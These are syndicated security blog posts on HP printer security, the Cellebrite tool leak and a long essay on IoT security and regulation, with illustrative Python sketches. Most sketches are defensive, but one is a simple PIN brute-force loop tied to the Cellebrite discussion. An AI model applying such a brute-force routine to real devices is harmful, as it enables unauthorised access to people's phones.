
You don’t need printer security

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/02/you-dont-need-printer-security.html

So there’s this tweet:

What it’s probably referring to is this:

This is an obviously bad idea.

Well, not so “obvious,” as some people have asked me to clarify the situation. After all, without “security”, couldn’t a printer just be added to a botnet of IoT devices?

The answer is this:

Fixing insecurity is almost always better than adding a layer of security.

Adding security is notoriously problematic, for three reasons:

  1. Hackers are active attackers. When presented with a barrier in front of an insecurity, they’ll often find ways around that barrier. It’s a common problem with “web application firewalls”, for example.
  2. The security software itself can become a source of vulnerabilities hackers can attack, which has happened frequently in anti-virus and intrusion prevention systems.
  3. Security features are usually snake oil: they sound great on paper, but no details and no independent evaluation are provided to the public.

It’s the last one that’s most important. HP markets features, but there’s no guarantee they work. In particular, similar features in other products have proven not to work in the past.

HP describes its three special features in a brief whitepaper [*]. They aren’t bad, but at the same time, they aren’t particularly good. Windows already offers all these features. Indeed, as far as I know, they are just using Windows as their firmware operating system, and are just slapping an “HP” marketing name onto existing Windows functionality.

HP Sure Start: This refers to the standard feature in almost all devices these days of having a secure boot process. Windows supports this in UEFI boot. Apple’s iPhones work this way, which is why the FBI needed Apple’s help to break into a captured terrorist’s phone. It’s a feature built into most IoT hardware, though most don’t enable it in software.
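At heart, a secure boot process of the kind described is a chain of integrity checks: each immutable or already-verified stage checks the next stage before handing over control. This Python sketch models the idea with hypothetical image contents, using plain SHA-256 hashes as a stand-in for the cryptographic signature verification real hardware performs:

```python
import hashlib

# Hypothetical "known-good" digests, baked into the prior boot stage.
TRUSTED_BOOTLOADER_HASH = hashlib.sha256(b"bootloader-image").hexdigest()
TRUSTED_FIRMWARE_HASH = hashlib.sha256(b"firmware-image").hexdigest()

def verify_stage(image: bytes, expected_hash: str) -> bool:
    """Accept the image only if it matches the digest from the prior stage."""
    return hashlib.sha256(image).hexdigest() == expected_hash

def boot(bootloader: bytes, firmware: bytes) -> str:
    # The immutable boot ROM checks the bootloader...
    if not verify_stage(bootloader, TRUSTED_BOOTLOADER_HASH):
        return "halt: bootloader tampered"
    # ...and the now-verified bootloader checks the firmware.
    if not verify_stage(firmware, TRUSTED_FIRMWARE_HASH):
        return "halt: firmware tampered"
    return "boot ok"
```

Tampering with any stage breaks the chain, which is why the FBI could not simply load modified firmware onto that iPhone without Apple’s signing key.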

Whitelisting: Their description sounds like “signed firmware updates”, but if that were the case, they’d call it that. Traditionally, “whitelisting” referred to a different feature: a list of hashes of the programs allowed to run on the device. Either way, it’s pretty common functionality.
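The traditional hash-whitelist sense of the term fits in a few lines of Python. The binaries and digests here are hypothetical; the point is only the mechanism, which is why it’s such common functionality:

```python
import hashlib

# Hypothetical allowlist: SHA-256 digests of the only programs the
# device will run. Anything not on the list is refused.
ALLOWED_DIGESTS = {
    hashlib.sha256(b"print-spooler-v1.0").hexdigest(),
    hashlib.sha256(b"web-admin-v2.3").hexdigest(),
}

def may_execute(binary: bytes) -> bool:
    """Permit execution only if the binary's digest is whitelisted."""
    return hashlib.sha256(binary).hexdigest() in ALLOWED_DIGESTS
```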

Run-time intrusion detection: They have numerous, conflicting descriptions on their website. It may mean scanning memory for signatures of known viruses. It may mean stack cookies. It may mean double-checking kernel modules. Windows does all of these things, and they provide only a tiny benefit in stopping security threats.

As for traditional attacks against printers, none of these features really matters. What you need to secure a printer is the ability to disable services you aren’t using (close ports), enable passwords and other access controls, and delete files of old print jobs so hackers can’t grab them from the printer. HP has features to address these security problems, but then, so do its competitors.

Lastly, printers should be behind firewalls, not only protected from the Internet but also segmented from the corporate network, so that only the designated ports, and only flows between the printer and print servers, are enabled.
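That segmentation policy amounts to a default-deny rule with a short allowlist. Here is a conceptual sketch in Python with hypothetical addresses; a real deployment would express this as firewall rules rather than code, but the logic is the same:

```python
# Hypothetical addresses: the print server on the corporate network,
# the printer on its own VLAN behind the firewall.
PRINT_SERVER = "10.0.1.5"
PRINTER = "10.0.2.9"
PRINT_PORTS = {9100, 631, 515}  # raw/JetDirect, IPP, LPD

def firewall_permits(src: str, dst: str, port: int) -> bool:
    """Default-deny: allow only designated print flows into the printer VLAN."""
    return src == PRINT_SERVER and dst == PRINTER and port in PRINT_PORTS
```

Everything else, including any connection the printer tries to make outbound to the Internet, is dropped by default.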

Conclusion

The features HP describes are snake oil. If they worked well, they’d still only address a small part of the spectrum of attacks against printers. And, since there’s no technical details or independent evaluation of the features, they are almost certainly lies.

If HP really cared about security, they’d make their software more secure. They’d use fuzzing tools like AFL. They’d enable ASLR and stack cookies. They’d compile C code with run-time buffer overflow checks. They’d have a bug bounty program. It’s not something they can easily market, but at least it’d be real.

If you care about printer security, take the steps I outline above, especially firewalling printers from the rest of the network. Seriously, putting a $100 firewall between a VLAN for your printers and the rest of the network is a cheap and easy way to get a vast amount of security. If you can’t secure printers this way, buying snake-oil features like the ones HP describes won’t help you.

Hacker Leaks Cellebrite’s Phone-Hacking Tools

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/hacker_leaks_ce.html

In January we learned that a hacker broke into Cellebrite’s network and stole 900GB of data. Now the hacker has dumped some of Cellebrite’s phone-hacking tools on the Internet.

In their README, the hacker notes that much of the iOS-related code is very similar to that used in the jailbreaking scene -- a community of iPhone hackers who typically break into iOS devices and release their code publicly for free.

Jonathan Zdziarski, a forensic scientist, agreed that some of the iOS files were nearly identical to tools created and used by the jailbreaking community, including patched versions of Apple’s firmware designed to break security mechanisms on older iPhones. A number of the configuration files also reference “limera1n,” the name of a piece of jailbreaking software created by infamous iPhone hacker Geohot. He said he wouldn’t call the released files “exploits,” however.

Zdziarski also said that other parts of the code were similar to a jailbreaking project called QuickPwn, but that the code had seemingly been adapted for forensic purposes. For example, some of the code in the dump was designed to brute-force PINs, which would be unusual for normal jailbreaking software.
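The brute-force adaptation Zdziarski describes is conceptually trivial. In this sketch, `check` is a hypothetical stand-in for the device’s unlock test; such a loop only works in practice because patched firmware has removed the rate limits and wipe-on-failure protections a stock device enforces:

```python
from itertools import product

def brute_force_pin(check, length=4):
    """Try every numeric PIN of the given length until `check` accepts one.
    `check` stands in for the device's unlock routine (hypothetical)."""
    for digits in product("0123456789", repeat=length):
        candidate = "".join(digits)
        if check(candidate):
            return candidate
    return None  # exhausted the keyspace without a match
```

A 4-digit PIN has only 10,000 possibilities, which is why unthrottled guessing defeats it almost instantly.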

“If, and it’s a big if, they used this in UFED or other products, it would indicate they ripped off software verbatim from the jailbreak community and used forensically unsound and experimental software in their supposedly scientific and forensically validated products,” Zdziarski continued.

If you remember, Cellebrite was the company that supposedly helped the FBI break into the San Bernardino terrorist’s iPhone. (I say “supposedly,” because the evidence is unclear.) We do know that they provide this sort of forensic assistance to countries like Russia, Turkey, and the UAE -- as well as to many US jurisdictions.

As Cory Doctorow points out:

…suppressing disclosure of security vulnerabilities in commonly used tools does not prevent those vulnerabilities from being independently discovered and weaponized — it just means that users, white-hat hackers and customers are kept in the dark about lurking vulnerabilities, even as they are exploited in the wild, which only end up coming to light when they are revealed by extraordinary incidents like this week’s dump.

We are all safer when vulnerabilities are reported and fixed, not when they are hoarded and used in secret.

Slashdot thread.

Security and the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/security_and_th.html

Last year, on October 21, your digital video recorder -- or at least a DVR like yours -- knocked Twitter off the internet. Someone used your DVR, along with millions of insecure webcams, routers, and other connected devices, to launch an attack that started a chain reaction, resulting in Twitter, Reddit, Netflix, and many sites going off the internet. You probably didn’t realize that your DVR had that kind of power. But it does.

All computers are hackable. This has as much to do with the computer market as it does with the technologies. We prefer our software full of features and inexpensive, at the expense of security and reliability. That your computer can affect the security of Twitter is a market failure. The industry is filled with market failures that, until now, have been largely ignorable. As computers continue to permeate our homes, cars, and businesses, these market failures will no longer be tolerable. Our only solution will be regulation, and that regulation will be foisted on us by a government desperate to “do something” in the face of disaster.

In this article I want to outline the problems, both technical and political, and point to some regulatory solutions. Regulation might be a dirty word in today’s political climate, but security is the exception to our small-government bias. And as the threats posed by computers become greater and more catastrophic, regulation will be inevitable. So now’s the time to start thinking about it.

We also need to reverse the trend to connect everything to the internet. And if we risk harm and even death, we need to think twice about what we connect and what we deliberately leave uncomputerized.

If we get this wrong, the computer industry will look like the pharmaceutical industry, or the aircraft industry. But if we get this right, we can maintain the innovative environment of the internet that has given us so much.

**********

We no longer have things with computers embedded in them. We have computers with things attached to them.

Your modern refrigerator is a computer that keeps things cold. Your oven, similarly, is a computer that makes things hot. An ATM is a computer with money inside. Your car is no longer a mechanical device with some computers inside; it’s a computer with four wheels and an engine. Actually, it’s a distributed system of over 100 computers with four wheels and an engine. And, of course, your phones became full-power general-purpose computers in 2007, when the iPhone was introduced.

We wear computers: fitness trackers and computer-enabled medical devices -- and, of course, we carry our smartphones everywhere. Our homes have smart thermostats, smart appliances, smart door locks, even smart light bulbs. At work, many of those same smart devices are networked together with CCTV cameras, sensors that detect customer movements, and everything else. Cities are starting to embed smart sensors in roads, streetlights, and sidewalk squares, as well as smart energy grids and smart transportation networks. A nuclear power plant is really just a computer that produces electricity, and -- like everything else we’ve just listed -- it’s on the internet.

The internet is no longer a web that we connect to. Instead, it’s a computerized, networked, and interconnected world that we live in. This is the future, and what we’re calling the Internet of Things.

Broadly speaking, the Internet of Things has three parts. There are the sensors that collect data about us and our environment: smart thermostats, street and highway sensors, and those ubiquitous smartphones with their motion sensors and GPS location receivers. Then there are the “smarts” that figure out what the data means and what to do about it. This includes all the computer processors on these devices and -- increasingly -- in the cloud, as well as the memory that stores all of this information. And finally, there are the actuators that affect our environment. The point of a smart thermostat isn’t to record the temperature; it’s to control the furnace and the air conditioner. Driverless cars collect data about the road and the environment to steer themselves safely to their destinations.
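The sensor/smarts/actuator split can be made concrete with a toy thermostat loop. This is a minimal sketch of the pattern, not any vendor’s actual control logic:

```python
from dataclasses import dataclass

@dataclass
class Thermostat:
    """Sense -> think -> act: the minimal loop behind any smart thermostat."""
    target: float = 20.0       # desired temperature, Celsius
    furnace_on: bool = False   # the actuator's current state

    def step(self, sensed_temp: float) -> bool:
        # The "smarts": compare the sensor reading to the target, with a
        # half-degree of hysteresis so the furnace doesn't rapidly cycle.
        if sensed_temp < self.target - 0.5:
            self.furnace_on = True       # actuate: turn the furnace on
        elif sensed_temp > self.target + 0.5:
            self.furnace_on = False      # actuate: turn it off
        return self.furnace_on
```

Every IoT device is some variation of this loop; the security question is what happens when an attacker, rather than the sensor, supplies the input.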

You can think of the sensors as the eyes and ears of the internet. You can think of the actuators as the hands and feet of the internet. And you can think of the stuff in the middle as the brain. We are building an internet that senses, thinks, and acts.

This is the classic definition of a robot. We’re building a world-size robot, and we don’t even realize it.

To be sure, it’s not a robot in the classical sense. We think of robots as discrete autonomous entities, with sensors, brain, and actuators all together in a metal shell. The world-size robot is distributed. It doesn’t have a singular body, and parts of it are controlled in different ways by different people. It doesn’t have a central brain, and it has nothing even remotely resembling a consciousness. It doesn’t have a single goal or focus. It’s not even something we deliberately designed. It’s something we have inadvertently built out of the everyday objects we live with and take for granted. It is the extension of our computers and networks into the real world.

This world-size robot is actually more than the Internet of Things. It’s a combination of several decades-old computing trends: mobile computing, cloud computing, always-on computing, huge databases of personal information, the Internet of Things -- or, more precisely, cyber-physical systems -- autonomy, and artificial intelligence. And while it’s still not very smart, it’ll get smarter. It’ll get more powerful and more capable through all the interconnections we’re building.

It’ll also get much more dangerous.

**********

Computer security has been around for almost as long as computers have been. And while it’s true that security wasn’t part of the design of the original internet, it’s something we have been trying to achieve since its beginning.

I have been working in computer security for over 30 years: first in cryptography, then more generally in computer and network security, and now in general security technology. I have watched computers become ubiquitous, and have seen firsthand the problems -- and solutions -- of securing these complex machines and systems. I’m telling you all this because what used to be a specialized area of expertise now affects everything. Computer security is now everything security. There’s one critical difference, though: The threats have become greater.

Traditionally, computer security is divided into three categories: confidentiality, integrity, and availability. For the most part, our security concerns have centered on confidentiality. We’re concerned about our data and who has access to it -- the world of privacy and surveillance, of data theft and misuse.

But threats come in many forms. Availability threats: computer viruses that delete our data, or ransomware that encrypts our data and demands payment for the unlock key. Integrity threats: hackers who can manipulate data entries can do things ranging from changing grades in a class to changing the amount of money in bank accounts. Some of these threats are pretty bad. Hospitals have paid tens of thousands of dollars to criminals whose ransomware encrypted critical medical files. JPMorgan Chase spends half a billion dollars a year on cybersecurity.

Today, the integrity and availability threats are much worse than the confidentiality threats. Once computers start affecting the world in a direct and physical manner, there are real risks to life and property. There is a fundamental difference between crashing your computer and losing your spreadsheet data, and crashing your pacemaker and losing your life. This isn’t hyperbole; recently researchers found serious security vulnerabilities in St. Jude Medical’s implantable heart devices. Give the internet hands and feet, and it will have the ability to punch and kick.

Take a concrete example: modern cars, those computers on wheels. The steering wheel no longer turns the axles, nor does the accelerator pedal change the speed. Every move you make in a car is processed by a computer, which does the actual controlling. A central computer controls the dashboard. There’s another in the radio. The engine has 20 or so computers. These are all networked, and increasingly autonomous.

Now, let’s start listing the security threats. We don’t want car navigation systems to be used for mass surveillance, or the microphone for mass eavesdropping. We might want it to be used to determine a car’s location in the event of a 911 call, and possibly to collect information about highway congestion. We don’t want people to hack their own cars to bypass emissions-control limitations. We don’t want manufacturers or dealers to be able to do that, either, as Volkswagen did for years. We can imagine wanting to give police the ability to remotely and safely disable a moving car; that would make high-speed chases a thing of the past. But we definitely don’t want hackers to be able to do that. We definitely don’t want them disabling the brakes in every car without warning, at speed. As we make the transition from driver-controlled cars to cars with various driver-assist capabilities to fully driverless cars, we don’t want any of those critical components subverted. We don’t want someone to be able to accidentally crash your car, let alone do it on purpose. And equally, we don’t want them to be able to manipulate the navigation software to change your route, or the door-lock controls to prevent you from opening the door. I could go on.

That’s a lot of different security requirements, and the effects of getting them wrong range from illegal surveillance to extortion by ransomware to mass death.

**********

Our computers and smartphones are as secure as they are because companies like Microsoft, Apple, and Google spend a lot of time testing their code before it’s released, and quickly patch vulnerabilities when they’re discovered. Those companies can support large, dedicated teams because those companies make a huge amount of money, either directly or indirectly, from their software ­ and, in part, compete on its security. Unfortunately, this isn’t true of embedded systems like digital video recorders or home routers. Those systems are sold at a much lower margin, and are often built by offshore third parties. The companies involved simply don’t have the expertise to make them secure.

At a recent hacker conference, a security researcher analyzed 30 home routers and was able to break into half of them, including some of the most popular and common brands. The denial-of-service attacks that forced popular websites like Reddit and Twitter off the internet last October were enabled by vulnerabilities in devices like webcams and digital video recorders. In August, two security researchers demonstrated a ransomware attack on a smart thermostat.

Even worse, most of these devices don’t have any way to be patched. Companies like Microsoft and Apple continuously deliver security patches to your computers. Some home routers are technically patchable, but in a complicated way that only an expert would attempt. And the only way for you to update the firmware in your hackable DVR is to throw it away and buy a new one.

The market can’t fix this because neither the buyer nor the seller cares. The owners of the webcams and DVRs used in the denial-of-service attacks don’t care. Their devices were cheap to buy, they still work, and they don’t know any of the victims of the attacks. The sellers of those devices don’t care: They’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution, because the insecurity is what economists call an externality: It’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

**********

Security is an arms race between attacker and defender. Technology perturbs that arms race by changing the balance between attacker and defender. Understanding how this arms race has unfolded on the internet is essential to understanding why the world-size robot we’re building is so insecure, and how we might secure it. To that end, I have five truisms, born from what we’ve already learned about computer and internet security. They will soon affect the security arms race everywhere.

Truism No. 1: On the internet, attack is easier than defense.

There are many reasons for this, but the most important is the complexity of these systems. More complexity means more people involved, more parts, more interactions, more mistakes in the design and development process, more of everything where hidden insecurities can be found. Computer-security experts like to speak about the attack surface of a system: all the possible points an attacker might target and that must be secured. A complex system means a large attack surface. The defender has to secure the entire attack surface. The attacker just has to find one vulnerability -- one unsecured avenue for attack -- and gets to choose how and when to attack. It’s simply not a fair battle.

There are other, more general, reasons why attack is easier than defense. Attackers have a natural agility that defenders often lack. They don’t have to worry about laws, and often not about morals or ethics. They don’t have a bureaucracy to contend with, and can more quickly make use of technical innovations. Attackers also have a first-mover advantage. As a society, we’re generally terrible at proactive security; we rarely take preventive security measures until an attack actually happens. So more advantages go to the attacker.

Truism No. 2: Most software is poorly written and insecure.

If complexity isn’t enough, we compound the problem by producing lousy software. Well-written software, like the kind found in airplane avionics, is both expensive and time-consuming to produce. We don’t want that. For the most part, poorly written software has been good enough. We’d all rather live with buggy software than pay the prices good software would require. We don’t mind if our games crash regularly, or our business applications act weird once in a while. Because software has been largely benign, it hasn’t mattered. This has permeated the industry at all levels. At universities, we don’t teach how to code well. Companies don’t reward quality code in the same way they reward fast and cheap. And we consumers don’t demand it.

But poorly written software is riddled with bugs, sometimes as many as one per 1,000 lines of code. Some of them are inherent in the complexity of the software, but most are programming mistakes. Not all bugs are vulnerabilities, but some are.
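The 1-per-1,000 figure invites some back-of-the-envelope arithmetic. The codebase size and the exploitability ratio below are purely illustrative assumptions, not numbers from the text:

```python
# Back-of-the-envelope: how many latent vulnerabilities might a large
# codebase contain, given ~1 bug per 1,000 lines of poorly written code?
lines_of_code = 50_000_000      # assumed: rough order of magnitude of a modern OS
bugs = lines_of_code // 1_000   # the text's figure: ~1 bug per 1,000 lines
vulnerabilities = bugs // 100   # assumed: 1 in 100 bugs is exploitable
```

Even with a generous exploitability ratio, that leaves hundreds of vulnerabilities lurking in a single large system, which is the defender’s problem in miniature.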

Truism No. 3: Connecting everything to each other via the internet will expose new vulnerabilities.

The more we network things together, the more vulnerabilities on one thing will affect other things. On October 21, vulnerabilities in a wide variety of embedded devices were all harnessed together to create what hackers call a botnet. This botnet was used to launch a distributed denial-of-service attack against a company called Dyn. Dyn provided a critical internet function for many major internet sites. So when Dyn went down, so did all those popular websites.

These chains of vulnerabilities are everywhere. In 2012, journalist Mat Honan suffered a massive personal hack because of one of them. A vulnerability in his Amazon account allowed hackers to get into his Apple account, which allowed them to get into his Gmail account. And in 2013, the Target Corporation was hacked by someone stealing credentials from its HVAC contractor.

Vulnerabilities like these are particularly hard to fix, because no one system might actually be at fault. It might be the insecure interaction of two individually secure systems.

Truism No. 4: Everybody has to stop the best attackers in the world.

One of the most powerful properties of the internet is that it allows things to scale. This is true for our ability to access data or control systems or do any of the cool things we use the internet for, but it’s also true for attacks. In general, fewer attackers can do more damage because of better technology. It’s not just that these modern attackers are more efficient, it’s that the internet allows attacks to scale to a degree impossible without computers and networks.

This is fundamentally different from what we’re used to. When securing my home against burglars, I am only worried about the burglars who live close enough to my home to consider robbing me. The internet is different. When I think about the security of my network, I have to be concerned about the best attacker possible, because he’s the one who’s going to create the attack tool that everyone else will use. The attacker that discovered the vulnerability used to attack Dyn released the code to the world, and within a week there were a dozen attack tools using it.

Truism No. 5: Laws inhibit security research.

The Digital Millennium Copyright Act is a terrible law that fails at its purpose of preventing widespread piracy of movies and music. To make matters worse, it contains a provision that has critical side effects. According to the law, it is a crime to bypass security mechanisms that protect copyrighted work, even if that bypassing would otherwise be legal. Since all software can be copyrighted, it is arguably illegal to do security research on these devices and to publish the result.

Although the exact contours of the law are arguable, many companies are using this provision of the DMCA to threaten researchers who expose vulnerabilities in their embedded systems. This instills fear in researchers, and has a chilling effect on research, which means two things: (1) Vendors of these devices are more likely to leave them insecure, because no one will notice and they won’t be penalized in the market, and (2) security engineers don’t learn how to do security better.

Unfortunately, companies generally like the DMCA. The provisions against reverse-engineering spare them the embarrassment of having their shoddy security exposed. It also allows them to build proprietary systems that lock out competition. (This is an important one. Right now, your toaster cannot force you to only buy a particular brand of bread. But because of this law and an embedded computer, your Keurig coffee maker can force you to buy a particular brand of coffee.)

**********

In general, there are two basic paradigms of security. We can either try to secure something well the first time, or we can make our security agile. The first paradigm comes from the world of dangerous things: from planes, medical devices, buildings. It’s the paradigm that gives us secure design and secure engineering, security testing and certifications, professional licensing, detailed preplanning and complex government approvals, and long times-to-market. It’s security for a world where getting it right is paramount because getting it wrong means people dying.

The second paradigm comes from the fast-moving and heretofore largely benign world of software. In this paradigm, we have rapid prototyping, on-the-fly updates, and continual improvement. In this paradigm, new vulnerabilities are discovered all the time and security disasters regularly happen. Here, we stress survivability, recoverability, mitigation, adaptability, and muddling through. This is security for a world where getting it wrong is okay, as long as you can respond fast enough.

These two worlds are colliding. They’re colliding in our cars -- literally -- in our medical devices, our building control systems, our traffic control systems, and our voting machines. And although these paradigms are wildly different and largely incompatible, we need to figure out how to make them work together.

So far, we haven’t done very well. We still largely rely on the first paradigm for the dangerous computers in cars, airplanes, and medical devices. As a result, there are medical systems that can’t have security patches installed because that would invalidate their government approval. In 2015, Chrysler recalled 1.4 million cars to fix a software vulnerability. In September 2016, Tesla remotely sent a security patch to all of its Model S cars overnight. Tesla sure sounds like it’s doing things right, but what vulnerabilities does this remote patch feature open up?

**********

Until now we’ve largely left computer security to the market. Because the computer and network products we buy and use are so lousy, an enormous after-market industry in computer security has emerged. Governments, companies, and people buy the security they think they need to secure themselves. We’ve muddled through well enough, but the market failures inherent in trying to secure this world-size robot will soon become too big to ignore.

Markets alone can’t solve our security problems. Markets are motivated by profit and short-term goals at the expense of society. They can’t solve collective-action problems. They won’t be able to deal with economic externalities, like the vulnerabilities in DVRs that resulted in Twitter going offline. And we need a counterbalancing force to corporate power.

This all points to policy. While the details of any computer-security system are technical, getting the technologies broadly deployed is a problem that spans law, economics, psychology, and sociology. And getting the policy right is just as important as getting the technology right because, for internet security to work, law and technology have to work together. This is probably the most important lesson of Edward Snowden’s NSA disclosures. We already knew that technology can subvert law. Snowden demonstrated that law can also subvert technology. Both fail unless each works. It’s not enough to just let technology do its thing.

Any policy changes to secure this world-size robot will mean significant government regulation. I know it’s a sullied concept in today’s world, but I don’t see any other possible solution. It’s going to be especially difficult on the internet, where its permissionless nature is one of the best things about it and the underpinning of its most world-changing innovations. But I don’t see how that can continue when the internet can affect the world in a direct and physical manner.

**********

I have a proposal: a new government regulatory agency. Before dismissing it out of hand, please hear me out.

We have a practical problem when it comes to internet regulation. There’s no government structure to tackle this at a systemic level. Instead, there’s a fundamental mismatch between the way government works and the way this technology works that makes dealing with this problem impossible at the moment.

Government operates in silos. In the U.S., the FAA regulates aircraft. The NHTSA regulates cars. The FDA regulates medical devices. The FCC regulates communications devices. The FTC protects consumers in the face of “unfair” or “deceptive” trade practices. Even worse, who regulates data can depend on how it is used. If data is used to influence a voter, it’s the Federal Election Commission’s jurisdiction. If that same data is used to influence a consumer, it’s the FTC’s. Use those same technologies in a school, and the Department of Education is now in charge. Robotics will have its own set of problems, and no one is sure how that is going to be regulated. Each agency has a different approach and different rules. They have no expertise in these new issues, and they are not quick to expand their authority for all sorts of reasons.

Compare that with the internet. The internet is a freewheeling system of integrated objects and networks. It grows horizontally, demolishing old technological barriers so that people and systems that never previously communicated now can. Already, apps on a smartphone can log health information, control your energy use, and communicate with your car. That’s a set of functions that crosses jurisdictions of at least four different government agencies, and it’s only going to get worse.

Our world-size robot needs to be viewed as a single entity with millions of components interacting with each other. Any solutions here need to be holistic. They need to work everywhere, for everything. Whether we’re talking about cars, drones, or phones, they’re all computers.

This has lots of precedent. Many new technologies have led to the formation of new government regulatory agencies. Trains did, cars did, airplanes did. Radio led to the formation of the Federal Radio Commission, which became the FCC. Nuclear power led to the formation of the Atomic Energy Commission, which eventually became the Department of Energy. The reasons were the same in every case. New technologies need new expertise because they bring with them new challenges. Governments need a single agency to house that new expertise, because its applications cut across several preexisting agencies. It’s less that the new agency needs to regulate -- although that’s often a big part of it -- and more that governments recognize the importance of the new technologies.

The internet has famously eschewed formal regulation, instead adopting a multi-stakeholder model of academics, businesses, governments, and other interested parties. My hope is that any regulatory agency can keep the best of this approach, looking to the new U.S. Digital Service or the 18F office inside the General Services Administration as models. Both organizations are dedicated to providing digital government services, both have collected significant expertise by bringing people in from outside of government, and both have learned how to work closely with existing agencies. Any internet regulatory agency will similarly need to engage in a high level of collaborative regulation -- both a challenge and an opportunity.

I don’t think any of us can predict the totality of the regulations we need to ensure the safety of this world, but here are a few. We need government to ensure companies follow good security practices: testing, patching, secure defaults -- and we need to be able to hold companies liable when they fail to do these things. We need government to mandate strong personal data protections, and limitations on data collection and use. We need to ensure that responsible security research is legal and well-funded. We need to enforce transparency in design, some sort of code escrow in case a company goes out of business, and interoperability between devices of different manufacturers, to counterbalance the monopolistic effects of interconnected technologies. Individuals need the right to take their data with them. And internet-enabled devices should retain some minimal functionality if disconnected from the internet.

I’m not the only one talking about this. I’ve seen proposals for a National Institutes of Health analog for cybersecurity. University of Washington law professor Ryan Calo has proposed a Federal Robotics Commission. I think it needs to be broader: maybe a Department of Technology Policy.

Of course there will be problems. There’s a lack of expertise in these issues inside government. There’s a lack of willingness in government to do the hard regulatory work. Industry is worried about any new bureaucracy: both that it will stifle innovation by regulating too much and that it will be captured by industry and regulate too little. A domestic regulatory agency will have to deal with the fundamentally international nature of the problem.

But government is the entity we use to solve problems like this. Governments have the scope, scale, and balance of interests to address the problems. It’s the institution we’ve built to adjudicate competing social interests and internalize market externalities. Left to its own devices, the market simply can’t. That we’re currently in the middle of an era of low government trust, where many of us can’t imagine government doing anything positive in an area like this, is to our detriment.

Here’s the thing: Governments will get involved, regardless. The risks are too great, and the stakes are too high. Government already regulates dangerous physical systems like cars and medical devices. And nothing motivates the U.S. government like fear. Remember 2001? A nominally small-government Republican president created the Office of Homeland Security 11 days after the terrorist attacks: a rushed and ill-thought-out decision that we’ve been trying to fix for over a decade. A fatal disaster will similarly spur our government into action, and it’s unlikely to be well-considered and thoughtful action. Our choice isn’t between government involvement and no government involvement. Our choice is between smarter government involvement and stupider government involvement. We have to start thinking about this now. Regulations are necessary, important, and complex; and they’re coming. We can’t afford to ignore these issues until it’s too late.

We also need to start disconnecting systems. If we cannot secure complex systems to the level required by their real-world capabilities, then we must not build a world where everything is computerized and interconnected.

There are other models. We can enable local communications only. We can set limits on collected and stored data. We can deliberately design systems that don’t interoperate with each other. We can deliberately fetter devices, reversing the current trend of turning everything into a general-purpose computer. And, most important, we can move toward less centralization and more distributed systems, which is how the internet was first envisioned.

This might be a heresy in today’s race to network everything, but large, centralized systems are not inevitable. The technical elites are pushing us in that direction, but they really don’t have any good supporting arguments other than the profits of their ever-growing multinational corporations.

But this will change. It will change not only because of security concerns, it will also change because of political concerns. We’re starting to chafe under the worldview of everything producing data about us and what we do, and that data being available to both governments and corporations. Surveillance capitalism won’t be the business model of the internet forever. We need to change the fabric of the internet so that evil governments don’t have the tools to create a horrific totalitarian state. And while good laws and regulations in Western democracies are a great second line of defense, they can’t be our only line of defense.

My guess is that we will soon reach a high-water mark of computerization and connectivity, and that afterward we will make conscious decisions about what and how we decide to interconnect. But we’re still in the honeymoon phase of connectivity. Governments and corporations are punch-drunk on our data, and the rush to connect everything is driven by an even greater desire for power and market share. One of the presentations released by Edward Snowden contained the NSA mantra: “Collect it all.” A similar mantra for the internet today might be: “Connect it all.”

The inevitable backlash will not be driven by the market. It will be deliberate policy decisions that put the safety and welfare of society above individual corporations and industries. It will be deliberate policy decisions that prioritize the security of our systems over the demands of the FBI to weaken them in order to make their law-enforcement jobs easier. It’ll be hard policy for many to swallow, but our safety will depend on it.

**********

The scenarios I’ve outlined, both the technological and economic trends that are causing them and the political changes we need to make to start to fix them, come from my years of working in internet-security technology and policy. All of this is informed by an understanding of both technology and policy. That turns out to be critical, and there aren’t enough people who understand both.

This brings me to my final plea: We need more public-interest technologists.

Over the past couple of decades, we’ve seen examples of getting internet-security policy badly wrong. I’m thinking of the FBI’s “going dark” debate about its insistence that computer devices be designed to facilitate government access, the “vulnerability equities process” about when the government should disclose and fix a vulnerability versus when it should use it to attack other systems, the debacle over paperless touch-screen voting machines, and the DMCA that I discussed above. If you watched any of these policy debates unfold, you saw policy-makers and technologists talking past each other.

Our world-size robot will exacerbate these problems. The historical divide between Washington and Silicon Valley -- the mistrust of governments by tech companies and the mistrust of tech companies by governments -- is dangerous.

We have to fix this. Getting IoT security right depends on the two sides working together and, even more important, having people who are experts in each working on both. We need technologists to get involved in policy, and we need policy-makers to get involved in technology. We need people who are experts in making both technology and technological policy. We need technologists on congressional staffs, inside federal agencies, working for NGOs, and as part of the press. We need to create a viable career path for public-interest technologists, much as there already is one for public-interest attorneys. We need courses, and degree programs in colleges, for people interested in careers in public-interest technology. We need fellowships in organizations that need these people. We need technology companies to offer sabbaticals for technologists wanting to go down this path. We need an entire ecosystem that supports people bridging the gap between technology and law. We need a viable career path that ensures that even though people in this field won’t make as much as they would in a high-tech start-up, they will have viable careers. The security of our computerized and networked future -- meaning the security of ourselves, families, homes, businesses, and communities -- depends on it.

This plea is bigger than security, actually. Pretty much all of the major policy debates of this century will have a major technological component. Whether it’s weapons of mass destruction, robots drastically affecting employment, climate change, food safety, or the increasing ubiquity of ever-shrinking drones, understanding the policy means understanding the technology. Our society desperately needs technologists working on the policy. The alternative is bad policy.

**********

The world-size robot is less designed than created. It’s coming without any forethought or architecting or planning; most of us are completely unaware of what we’re building. In fact, I am not convinced we can actually design any of this. When we try to design complex sociotechnical systems like this, we are regularly surprised by their emergent properties. The best we can do is observe and channel these properties as best we can.

Market thinking sometimes makes us lose sight of the human choices and autonomy at stake. Before we get controlled -- or killed -- by the world-size robot, we need to rebuild confidence in our collective governance institutions. Law and policy may not seem as cool as digital tech, but they’re also places of critical innovation. They’re where we collectively bring about the world we want to live in.

While I might sound like a Cassandra, I’m actually optimistic about our future. Our society has tackled bigger problems than this one. It takes work and it’s not easy, but we eventually find our way clear to make the hard choices necessary to solve our real problems.

